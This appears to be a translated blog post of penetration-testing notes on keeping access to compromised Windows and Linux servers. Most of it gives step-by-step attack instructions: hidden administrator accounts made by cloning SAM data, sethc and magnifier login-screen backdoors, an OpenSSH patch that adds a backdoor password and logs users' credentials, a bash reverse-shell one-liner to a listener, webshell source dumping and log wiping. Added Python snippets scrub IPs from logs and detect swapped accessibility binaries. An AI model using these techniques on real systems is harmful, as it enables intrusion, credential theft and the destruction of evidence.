Network Security (Penetration, Part 13)

Windows

  1. User-account backdoor
    net user
    net user aa /add
    net localgroup administrators aa /add
    My Computer - Manage - Local Users and Groups: right-click the user you just created and set a password.
    Open the registry (regedit), select the SAM key and grant Everyone Full Control on it (the SAM hive is otherwise unreadable even to administrators).
    Find the Administrator's name under SAM\SAM\Domains\Account\Users\Names; its type field shows the RID, 0x1f4.
    Open the user key of that RID (000001F4), open its binary value F, select all and copy.
    Do the same for the user you created: open its F value and paste the Administrator's binary data over it.
    Finally remove the Everyone permission you added.


    net user guest /active:yes
    net user guest 123.com
    net localgroup administrators guest /add


    Hidden account:
    Use the built-in support_388945a0 user (the Help and Support account, disabled by default).
    Computer - Manage - Users: set a password for support_388945a0,
    right-click - Properties - Dial-in - allow remote access.

    My Computer - Manage - Local Users and Groups: right-click the user and set its password.
    Open the registry (regedit), select the SAM key and grant Everyone Full Control.
    Find Administrator under SAM\SAM\Domains\Account\Users\Names; its type field shows the RID 0x1f4.
    Open the 000001F4 key, open the binary value F, select all and copy.
    Do the same for support_388945a0: open its F value and paste the Administrator's data over it.
    Finally remove the Everyone permission.

    My Computer - Properties - Remote: enable Remote Desktop.

  2. lpk backdoor
    After creating a user,
    use the lpk tool to generate an lpk.dll,
    then copy lpk.dll into system32 on the target server.
    On the target's 3389 logon screen press Shift five times to bring up Sticky Keys,
    then press the hotkey configured in the tool and enter the password to launch the program.

  3. Trojan backdoor
    Dream Era (remote-control trojan)

Clearing traces - Computer - Manage
Event Viewer - Security - right-click - Clear All Events

IIS Manager - Web Site Properties - Enable logging - Properties
The log file properties show the log directory; open it in My Computer and delete the access records

Linux

  1. Backdoor (patched OpenSSH)
    Upload the two archives and unpack them:
    tar zxvf openssh-5.9p1.tar.gz
    tar zxvf 0x06-openssh-5.9p1.patch.tar.gz
    cd openssh-5.9p1.patch/
    cp sshbd5.9p1.diff ../openssh-5.9p1
    cd ../openssh-5.9p1
    patch < sshbd5.9p1.diff        # apply the backdoor patch

    vi includes.h                   # change the backdoor password and the log file locations
    /*
    +#define ILOG "/tmp/ilog"       // records the user names and passwords of logins to this machine
    +#define OLOG "/tmp/olog"       // records the user names and passwords used from here to log in to remote hosts
    +#define SECRETPW "123456"      // backdoor password
    */

    yum install -y openssl openssl-devel pam-devel
    ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5

    // if zlib causes problems during the build:
    // yum -y install zlib zlib-devel

    make && make install
    service sshd restart            # restart sshd
    log in over ssh with the backdoor password

Clearing traces
/var/log/httpd/access_log
/etc/httpd/logs/access_log (on CentOS this is a symlink to the same directory)

Edit the file directly and remove every access record made from your IP:
vim /var/log/httpd/access_log
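Doing the access_log edit above programmatically, and checking what it leaves behind, as an added example that is not part of the original notes. Two things matter in practice: a plain substring match on 192.168.31.23 also deletes records for 192.168.31.237, so the client field has to be matched as a whole token, and the same IP appears in logs the notes never touch (error_log, /var/log/secure for the ssh login, the shell history), which is exactly what an investigator compares against. All log lines, paths and host names here are constructed sample data.

```python
"""Scrub a client IP from access_log and count what survives elsewhere
(added example, not from the original notes; all log data is constructed)."""
import ipaddress
import re

ACCESS_LOG = (
    '192.168.31.237 - - [24/Feb/2020:10:01:02 +0800] "GET /nosafe.php HTTP/1.1" 200 512\n'
    '192.168.31.23 - - [24/Feb/2020:10:01:05 +0800] "GET /index.php HTTP/1.1" 200 4096\n'
    '10.0.0.5 - - [24/Feb/2020:10:01:09 +0800] "GET /HSH.mdb HTTP/1.1" 404 210\n'
    '192.168.31.237 - - [24/Feb/2020:10:02:30 +0800] "POST /nosafe.php HTTP/1.1" 200 77\n'
)

OTHER_LOGS = {  # constructed, abbreviated to one or two lines each
    "/var/log/httpd/error_log":
        "[Mon Feb 24 10:01:09 2020] [error] [client 10.0.0.5] File does not exist: /var/www/html/HSH.mdb\n",
    "/var/log/secure":
        "Feb 24 10:05:11 web sshd[2211]: Accepted password for root from 192.168.31.237 port 50122 ssh2\n",
    "/root/.bash_history":
        "vim /var/log/httpd/access_log\nssh root@192.168.31.237\n",
}


def ip_token(ip):
    """Regex that matches ip only as a whole address, so 192.168.31.23 does
    not match inside 192.168.31.237."""
    ipaddress.ip_address(ip)  # reject anything that is not an IP literal
    return r"(?<![\d.])" + re.escape(ip) + r"(?![\d.])"


def scrub_client(log_text, ip):
    """Drop lines whose first (client) field is exactly ip.
    Returns (remaining text, number of lines dropped)."""
    ipaddress.ip_address(ip)
    pat = re.compile(r"^" + re.escape(ip) + r"\s")   # anchored: client field then a space
    kept, dropped = [], 0
    for line in log_text.splitlines():
        if pat.match(line):
            dropped += 1
        else:
            kept.append(line)
    return "\n".join(kept) + ("\n" if kept else ""), dropped


def mentions_elsewhere(files, ip):
    """{path: number of lines still naming ip} across logs the notes do not edit."""
    pat = re.compile(ip_token(ip))
    return {path: sum(1 for line in text.splitlines() if pat.search(line))
            for path, text in files.items()}


if __name__ == "__main__":
    text, dropped = scrub_client(ACCESS_LOG, "192.168.31.237")
    print("dropped %d lines, %d left" % (dropped, len(text.splitlines())))
    print(mentions_elsewhere(OTHER_LOGS, "192.168.31.237"))
```

Even a clean scrub of the live access_log leaves the file's modification time, the rotated copies (access_log.1, access_log-*.gz) and any remote syslog feed untouched, so the edited file is easy to tell apart from its rotated siblings.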

Packaging the source code

ASP: the source packer generates HSH.mdb;
request HSH.mdb from the same directory as the webshell to download it,
then open the packer shell locally to unpack it.

PHP: use the nosafe.php webshell; in the site root directory there is a "select all" at the very bottom,
then choose compress.

Tuoku (dumping the database):
Data management - database-dump webshell (tuokuma)


Reverse shell

echo "bash -i >& /dev/tcp/192.168.31.237/4444 0>&1" | bash

bash -i: bash is the usual Linux shell; -i makes it spawn an interactive shell.

/dev/tcp/192.168.175.134/8080 (the command above uses 192.168.31.237/4444; the form is the same): /dev/tcp/<ip>/<port> and /dev/udp/<ip>/<port> are special paths that exist only inside bash. They are not real files (ls will not find them on disk); opening one makes bash establish a TCP or UDP connection to that host and port.

>& /dev/tcp/...: redirect both standard output (1) and standard error (2) into that connection.

0>&1: redirect standard input (0) to wherever standard output (1) already points. Since 1 has already been redirected to /dev/tcp/192.168.175.134/8080, stdin, stdout and stderr all go through the connection: commands typed on the listener are read by the shell, and their output and errors come back over the same socket.

echo "..." | bash: the pipe feeds the command line into bash, so the redirection is interpreted by bash even when the current shell is sh, which does not understand /dev/tcp.


Shift backdoor (sethc.exe)
Delete C:\WINDOWS\system32\dllcache\sethc.exe. This folder holds the Windows File Protection cache; if the cached copy is not deleted, Windows automatically restores the original file.

Delete C:\WINDOWS\system32\sethc.exe.

Rename (or copy) C:\WINDOWS\system32\cmd.exe to sethc.exe in the same directory.

At the logon screen press Shift five times: a command prompt pops up, running as SYSTEM before anyone has logged on.


Magnifier backdoor

Create magnify.bat (the account name must be the same on both net lines; the original notes used two different names):

@echo off
rem create the account and make it an administrator
net user hack$ woaijiushi /add
net localgroup administrators hack$ /add
rem start the real magnifier so Win+U still appears to work (assumes the original magnify.exe was renamed to nagnify.exe beforehand)
%Windir%\system32\nagnify.exe
exit

Use Bat2Com or a similar tool to convert the .bat into an .exe.
Replace both C:\WINDOWS\system32\magnify.exe and C:\WINDOWS\system32\dllcache\magnify.exe with the generated magnify.exe.

Trigger it from the logon screen with the Win+U key combination.
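A check that catches both the sethc and the magnify swap described above, as an added example that is not part of the original notes. Both tricks replace a program that winlogon starts from the logon screen before any credential is entered, so a defender can compare those binaries against cmd.exe and against their dllcache backup copies without needing signatures. The scan generalises to the other accessibility helpers launched the same way (utilman.exe, osk.exe, narrator.exe, displayswitch.exe), and also looks for batch commands inside the helper, on the assumption that a bat-to-exe wrapper stores the script text in the clear. `self_test` builds a fake system32 from constructed files; no real Windows binaries are involved, and the marker list and file contents are this example's own.

```python
"""Spot swapped accessibility binaries (added example, not from the original notes)."""
import hashlib
import os
import tempfile

# Helpers winlogon can start from the logon screen; sethc and magnify are the two above.
ACCESSIBILITY = ["sethc.exe", "magnify.exe", "utilman.exe", "osk.exe",
                 "narrator.exe", "displayswitch.exe"]
# Strings a wrapped batch script would leave inside the exe (assumed stored in the clear).
BATCH_MARKERS = [b"net user", b"net localgroup", b"@echo off"]


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def check_accessibility_binaries(system32):
    """Return {helper name: [reasons]} for helpers that look replaced.
    Point system32 at a live or mounted Windows\\system32 directory."""
    findings = {}

    def flag(name, reason):
        findings.setdefault(name, []).append(reason)

    cmd = os.path.join(system32, "cmd.exe")
    cmd_hash = sha256_file(cmd) if os.path.isfile(cmd) else None
    dllcache = os.path.join(system32, "dllcache")   # Windows File Protection backups

    for name in ACCESSIBILITY:
        path = os.path.join(system32, name)
        if not os.path.isfile(path):
            continue
        digest = sha256_file(path)
        if cmd_hash and digest == cmd_hash:
            flag(name, "byte-identical to cmd.exe")
        with open(path, "rb") as fh:
            body = fh.read().lower()
        hits = [m.decode() for m in BATCH_MARKERS if m in body]
        if hits:
            flag(name, "embeds batch commands: " + ", ".join(hits))
        if os.path.isdir(dllcache):
            cached = os.path.join(dllcache, name)
            if not os.path.isfile(cached):
                flag(name, "dllcache copy missing (WFP cannot restore it)")
            elif sha256_file(cached) != digest:
                flag(name, "differs from dllcache copy")
    return findings


def self_test():
    """Build a fake system32 from constructed files and scan it."""
    with tempfile.TemporaryDirectory() as root:
        s32 = os.path.join(root, "system32")
        os.makedirs(os.path.join(s32, "dllcache"))
        wrapped = b"MZ\x90@echo off\r\nnet user hack$ woaijiushi /add\r\n"
        files = {
            "cmd.exe": b"MZ\x90fake-cmd",
            "sethc.exe": b"MZ\x90fake-cmd",      # cmd.exe renamed, cache copy deleted
            "magnify.exe": wrapped,              # bat-to-exe wrapper, cache copy replaced too
            "dllcache/magnify.exe": wrapped,
            "osk.exe": b"MZ\x90fake-osk",        # untouched
            "dllcache/osk.exe": b"MZ\x90fake-osk",
        }
        for rel, data in files.items():
            with open(os.path.join(s32, rel), "wb") as fh:
                fh.write(data)
        return check_accessibility_binaries(s32)


if __name__ == "__main__":
    for name, reasons in self_test().items():
        print(name, reasons)
```

The same scan is worth running on the dllcache directory itself, since the notes replace that copy deliberately so File Protection cannot undo the swap.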


Origin blog.csdn.net/Aidang/article/details/104474845